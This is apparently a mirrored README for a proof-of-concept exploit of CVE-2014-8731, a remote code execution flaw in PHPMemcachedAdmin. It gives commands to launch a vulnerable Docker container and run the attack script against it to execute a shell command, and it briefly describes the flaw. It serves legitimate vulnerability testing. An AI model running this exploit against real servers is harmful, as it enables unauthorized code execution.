Giters

sbani / CVE-2014-8731-PoC

CVE-2014-8731 - PHPMemcachedAdmin RCE - Proof of Concept

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2014-8731-PoC - PHPMemcachedAdmin Remote Code Execution

A proof of concept tool to test your own system if they are vulnerable to CVE-2014-8731

Blog Post

PHPMemcachedAdmin Remote Code Execution - CVE-2014-8731 PoC

Run test

Start victim server:

docker run -p8081:80 --rm --name phpma -it alphayax/phpmemcachedadmin

Attack victim with PoC:

git clone https://github.com/sbani/CVE-2014-8731-PoC.git
cd CVE-2014-8731-PoC
python attack.py http://localhost:8081 id

CVE details

PHPMemcachedAdmin 1.2.2 and earlier allows remote attackers to execute arbitrary PHP code via vectors related "serialized data and the last part of the concatenated filename," which creates a file in webroot.

References:

About

CVE-2014-8731 - PHPMemcachedAdmin RCE - Proof of Concept

Languages

Language:Python 100.0%